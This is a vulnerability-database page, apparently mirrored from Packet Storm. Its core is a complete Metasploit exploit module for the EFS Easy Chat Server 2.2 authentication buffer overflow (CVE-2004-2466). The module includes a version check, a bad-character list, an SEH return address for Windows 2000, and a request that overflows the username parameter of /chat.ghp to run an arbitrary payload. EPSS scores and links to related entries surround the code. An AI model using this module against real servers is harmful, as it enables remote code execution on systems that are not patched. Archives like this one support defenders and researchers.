Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLSOPACKETSTORM:83219
HistoryNov 26, 2009 - 12:00 a.m.

EFS Easy Chat Server Authentication Request Handling Buffer Overflow

2009-11-2600:00:00
LSO
packetstormsecurity.com
23

EPSS

0.193

Percentile

96.3%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in EFS Software Easy Chat Server. By  
sending a overly long authentication request, an attacker may be able to execute  
arbitrary code.  
},  
'Author' => [ 'LSO <lso[@]hushmail.com>' ],  
'License' => BSD_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2004-2466' ],  
[ 'OSVDB', '7416' ],  
[ 'BID', '25328' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 500,  
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k  
],  
'DisclosureDate' => 'Aug 14 2007',  
'DefaultTarget' => 0))  
  
register_options( [ Opt::RPORT(80) ], self.class )  
end  
  
def check  
res = send_request_raw  
  
if res and res['Server'] =~ /Easy Chat Server\/1.0/  
return Exploit::CheckCode::Appears  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
# randomize some values.  
val = rand_text_alpha(rand(10) + 1)  
num = rand_text_numeric(1)  
  
# exploit buffer.  
filler = rand_text_alpha(216)  
seh = generate_seh_payload(target.ret)  
juju = filler + seh  
  
uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"  
  
print_status("Trying target #{target.name}...")  
  
send_request_raw({'uri' => uri}, 5)  
  
handler  
disconnect  
end  
  
end  
  
`

Related

packetstorm 3
exploitdb 4
cve 1
zdt 2
cvelist 1
nvd 1
packetstorm
packetstorm
Easy Chat Server 2.2 Buffer Overflow
2010-01-19 00:00:00
Easy Chat Server 3.1 Buffer Overflow
2018-03-17 00:00:00
Easy Chat Server 3.1 Buffer Overflow
2022-08-01 00:00:00
exploitdb
exploitdb
EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)
2010-08-06 00:00:00
EFS Easy Chat Server 2.2 - Remote Denial of Service
2007-08-14 00:00:00
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
2022-08-01 00:00:00
cve
cve
CVE-2004-2466
2005-08-20 04:00:00
zdt
zdt
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) Exploit
2022-08-01 00:00:00
Easy Chat Server 3.1 Buffer Overflow Exploit
2018-03-20 00:00:00
cvelist
cvelist
CVE-2004-2466
2005-08-20 04:00:00
nvd
nvd
CVE-2004-2466
2004-12-31 05:00:00

EPSS

0.193

Percentile

96.3%

JSON
Related for PACKETSTORM:83219
packetstorm3exploitdb4cve1zdt2cvelist1nvd1